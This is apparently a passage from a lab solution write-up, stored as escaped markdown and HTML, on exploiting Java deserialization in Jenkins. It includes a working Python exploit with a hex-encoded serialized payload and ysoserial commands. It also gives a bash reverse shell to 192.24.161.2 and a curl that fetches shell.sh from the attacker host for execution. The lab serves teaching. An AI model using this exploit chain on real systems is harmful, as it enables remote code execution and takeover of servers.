\x64\\x4c\\x00\\x08\\x72\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x74\\x00\\x1a\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x09\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x41\\x74\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x1e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x24\\x53\\x6f\\x75\\x72\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x06\\x74\\x68\\x69\\x73\\x24\\x30\\x74\\x00\\x19\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd0\\xfd\\x1f\\x3e\\x1a\\x3b\\x1c\\xc4\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\xd5\\xc6\\x35\\x27\\x39\\x77\\xb8\\xcb\\x03\\x00\\x04\\x4c\\x00\\x05\\x63\\x61\\x75\\x73\\x65\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\x3b\\x4c\\x00\\x0d\\x64\\x65\\x74\\x61\\x69\\x6c\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x71\\x00\\x7e\\x00\\x02\\x5b\\x00\\x0a\\x73\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x74\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x4c\\x00\\x14\\x73\\x75\\x70\\x70\\x72\\x65\\x73\
\x73\\x65\\x64\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x73\\x74\\x00\\x10\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4c\\x69\\x73\\x74\\x3b\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x71\\x00\\x7e\\x00\\x10\\x70\\x75\\x72\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x02\\x46\\x2a\\x3c\\x3c\\xfd\\x22\\x39\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x0b\\x73\\x72\\x00\\x1b\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x61\\x09\\xc5\\x9a\\x26\\x36\\xdd\\x85\\x02\\x00\\x04\\x49\\x00\\x0a\\x6c\\x69\\x6e\\x65\\x4e\\x75\\x6d\\x62\\x65\\x72\\x4c\\x00\\x0e\\x64\\x65\\x63\\x6c\\x61\\x72\\x69\\x6e\\x67\\x43\\x6c\\x61\\x73\\x73\\x71\\x00\\x7e\\x00\\x02\\x4c\\x00\\x08\\x66\\x69\\x6c\\x65\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x02\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x02\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x43\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x74\\x00\\x0c\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x3c\\x69\\x6e\\x69\\x74\\x3e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x32\\x71\\x00\\x7e\\x00\\x15\\x71\\x00\\x7e\\x00\\x16\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x63\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x0c\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\x39\\x74\\x00\\x32\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\
\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x24\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x1c\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xf6\\x74\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x71\\x00\\x7e\\x00\\x1e\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x24\\x50\\x72\\x6f\\x78\\x79\\x31\\x70\\x74\\x00\\x0f\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x74\\x00\\x0c\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x15\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x52\\x65\\x6d\\x6f\\x74\\x65\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x74\\x00\\x0e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x74\\x00\\x08\\x43\\x4c\\x49\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x74\\x00\\x1f\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x19\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x07\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2a\\x71\\x00\\x7e\\x00\\x2b\\x74\\x00\\x05\
\x5f\\x6d\\x61\\x69\\x6e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2a\\x71\\x00\\x7e\\x00\\x2b\\x74\\x00\\x04\\x6d\\x61\\x69\\x6e\\x73\\x72\\x00\\x26\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x4c\\x69\\x73\\x74\\xfc\\x0f\\x25\\x31\\xb5\\xec\\x8e\\x10\\x02\\x00\\x01\\x4c\\x00\\x04\\x6c\\x69\\x73\\x74\\x71\\x00\\x7e\\x00\\x0f\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x72\\x00\\x2c\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x19\\x42\\x00\\x80\\xcb\\x5e\\xf7\\x1e\\x02\\x00\\x01\\x4c\\x00\\x01\\x63\\x74\\x00\\x16\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3b\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x73\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x41\\x72\\x72\\x61\\x79\\x4c\\x69\\x73\\x74\\x78\\x81\\xd2\\x1d\\x99\\xc7\\x61\\x9d\\x03\\x00\\x01\\x49\\x00\\x04\\x73\\x69\\x7a\\x65\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x00\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x71\\x00\\x7e\\x00\\x39\\x78\\x71\\x00\\x7e\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x00\\x00\\x00\\x01\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x18\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x6c\\x69\\x45\\x6e\\x74\\x72\\x79\\x50\\x6f\\x69\\x6e\\x74\\x71\\x00\\x7e\\x00\\x24\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\
\xfd\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x74\\x00\\x1d\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x28\\x31\\x2c\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x29'\nprint 'sending payload...'\n'''outf = open('payload.tmp','w')\noutf.write(payload)\noutf.close()'''\nsock.send(payload)\n```\n\n**Step 5:** Create a reverse shell payload.\n\nCopy and paste the command into a file and save it as **shell.sh**.\n\n**Syntax:** bash -i >& /dev/tcp/&lt;lhost&gt;/&lt;lport&gt; 0>&1\n\n**Command:**\n```\nbash -i >& /dev/tcp/192.24.161.2/9999 0>&1\n```\n\n\n**Step 6:** Setup a Netcat listener that will be listening for connections on port 9999.\n\n**Command:**\n```\nnc -lvp 9999\n```\n![4](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/4.png)\n\n**Step 7:** Host the shell.sh file using a Python SimpleHTTPServer. In the same directory where the file is present, execute the below.\n\n**Command:**\n```\npython -m SimpleHTTPServer 8888\n```\n![5](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/5.png)\n\n**Step 8:** Generate a payload with a **ysoserial** file and make the target machine download the shell.sh file from attacker machine.\n\n**Command:**\n```\njava -jar ~/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections1 \"curl http://192.24.161.2:8888/shell.sh -o /tmp/shell.sh\" > /root/payload.out\n```\n![6](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/6.png)\n\n**Step 9:** Execute the python exploit code.\n\n**Usage:** python exploit.py  &lt;host&gt; &lt;port&gt; &lt;/path/to/payload&gt;\n\n**Command:**\n```\npython exploit.py 192.24.161.3 8080 /root/payload.out\n```\n![7](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/7.png)\n\nThis result from the python server shows that shell.sh file is downloaded by the target machine, and the payload is working 
as expected.\n\n![8](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/8.png)\n\nWe have to run the Python exploit two more times to execute the bash script on the target machine.\n\n**Step 10:** Generate a payload again, this time for making the downloaded shell.sh file executable.\n\n**Command:**\n```\njava -jar ~/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections1 \"chmod +x /tmp/shell.sh\" > /root/payload.out\n```\n![9](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/9.png)\n\n**Step 11:** Execute the Python code again to send the payload that makes the shell.sh file executable.\n\n**Command:**\n```\npython exploit.py 192.24.161.3 8080 /root/payload.out\n```\n![10](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/10.png)\n\n**Step 12:** Generate a payload again, this time for executing the downloaded shell.sh file.\n\n**Command:**\n```\njava -jar ~/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections1 \"/bin/bash /tmp/shell.sh\" > /root/payload.out\n```\n![11](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/11.png)\n\n**Step 13:** Execute the Python code again to send the payload to the target machine for executing the shell.sh file.\n\n**Command:**\n```\npython exploit.py 192.24.161.3 8080 /root/payload.out\n```\n![12](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/12.png)\n\n**Step 14:** Open the terminal where Netcat was listening. The shell should arrive on the Netcat listener.\n\nCheck the id with the following command.\n\n**Command:**\n```\nid\n```\n\n![13](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/13.png)\n\nRemote code execution has been achieved successfully.",
    "solutions_html": "<h1>Solution</h1>\n<p><strong>Step 1:</strong> Start the lab. Wait until the lab is ready. Once the lab is ready, the Kali Linux interface will be available in the browser.</p>\n<p><img alt=\"0\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/0.png\" /></p>\n<p><strong>Step 2:</strong> Scan the network with Nmap and gather information about the target machine.</p>\n<p>Use the following command to get information about the open ports and services on the network.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>nmap demo.ine.local</code></pre>\n<img alt=\"1\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/1.png\" /></p>\n<p>The scan output gives the IP address of the target machine and the ports that are open on it.</p>\n<p><strong>Step 3:</strong> Inspect the Jenkins application by navigating to the IP address at port 8080 in the web browser.</p>\n<p><strong>Target URL:</strong>\n<pre class=\"codehilite\"><code>http://192.24.161.3:8080/</code></pre></p>\n<p><img alt=\"2\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/2.png\" /></p>\n<p><strong>Step 4:</strong> Copy and paste the Python exploit code and save it as exploit.py.</p>\n<p><strong>Source:</strong> <a href=\"https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py\">https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py</a></p>\n<p><strong>Code:</strong>\n<pre class=\"codehilite\"><code class=\"language-py\">#!/usr/bin/python\n#usage: ./jenkins.py host port /path/to/payload\nimport socket\nimport sys\nimport requests\nimport base64\nhost = sys.argv[1]\nport = sys.argv[2]\n#Query Jenkins over HTTP to find what port the CLI listener is on\nr = requests.get('http://'+host+':'+port)\ncli_port = int(r.headers['X-Jenkins-CLI-Port'])\n#Open a socket to the CLI port\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_address = (host, 
cli_port)\nprint 'connecting to %s port %s' % server_address\nsock.connect(server_address)\n# Send headers\nheaders='\\x00\\x14\\x50\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x3a\\x43\\x4c\\x49\\x2d\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74'\nprint 'sending \"%s\"' % headers\nsock.send(headers)\ndata = sock.recv(1024)\nprint &gt;&gt;sys.stderr, 'received \"%s\"' % data\ndata = sock.recv(1024)\nprint &gt;&gt;sys.stderr, 'received \"%s\"' % data\npayloadObj = open(sys.argv[3],'rb').read()\npayload_b64 = base64.b64encode(payloadObj)\npayload='\\x3c\\x3d\\x3d\\x3d\\x5b\\x4a\\x45\\x4e\\x4b\\x49\\x4e\\x53\\x20\\x52\\x45\\x4d\\x4f\\x54\\x49\\x4e\\x47\\x20\\x43\\x41\\x50\\x41\\x43\\x49\\x54\\x59\\x5d\\x3d\\x3d\\x3d\\x3e'+payload_b64+'\\x00\\x00\\x00\\x00\\x11\\x2d\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1b\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x4c\\x00\\x10\\x63\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x50\\x72\\x6f\\x78\\x79\\x74\\x00\\x30\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x3b\\x5b\\x00\\x07\\x72\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x02\\x5b\\x42\\x4c\\x00\\x08\\x74\\x6f\\x53\\x74\\x72\\x69\\x6e\\x67\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x49\\x00\\x02\\x69\\x64\\x49\\x00\\x08\\x6c\\x61\\x73\\x74\\x49\\x6f\\x49\\x64\\x4c\\x00\\x08\\x72\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x74\\x00\\x1a\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\
x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x3b\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x09\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x41\\x74\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x3b\\x78\\x70\\x73\\x72\\x00\\x1e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x24\\x53\\x6f\\x75\\x72\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x06\\x74\\x68\\x69\\x73\\x24\\x30\\x74\\x00\\x19\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3b\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd0\\xfd\\x1f\\x3e\\x1a\\x3b\\x1c\\xc4\\x02\\x00\\x00\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\xd5\\xc6\\x35\\x27\\x39\\x77\\xb8\\xcb\\x03\\x00\\x04\\x4c\\x00\\x05\\x63\\x61\\x75\\x73\\x65\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\x3b\\x4c\\x00\\x0d\\x64\\x65\\x74\\x61\\x69\\x6c\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x71\\x00\\x7e\\x00\\x03\\x5b\\x00\\x0a\\x73\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x74\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x4c\\x00\\x14\\x73\\x75\\x70\\x70\\x72\\x65\\x73\\x73\\x65\\x64\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x73\\x74\\x00\\x10\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4c\\x69\\x73\\x74\\x3b\\x78\\x70\\x71\\x00\\x7e\\x00\\x10\\x70\\x75\\x72\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\
x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x02\\x46\\x2a\\x3c\\x3c\\xfd\\x22\\x39\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x0c\\x73\\x72\\x00\\x1b\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x61\\x09\\xc5\\x9a\\x26\\x36\\xdd\\x85\\x02\\x00\\x04\\x49\\x00\\x0a\\x6c\\x69\\x6e\\x65\\x4e\\x75\\x6d\\x62\\x65\\x72\\x4c\\x00\\x0e\\x64\\x65\\x63\\x6c\\x61\\x72\\x69\\x6e\\x67\\x43\\x6c\\x61\\x73\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x08\\x66\\x69\\x6c\\x65\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x00\\x00\\x00\\x43\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x74\\x00\\x0c\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x3c\\x69\\x6e\\x69\\x74\\x3e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x32\\x71\\x00\\x7e\\x00\\x15\\x71\\x00\\x7e\\x00\\x16\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x63\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x0c\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x3c\\x74\\x00\\x1b\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x10\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x03\\x08\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x74\\x00\\x0c\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x04\\
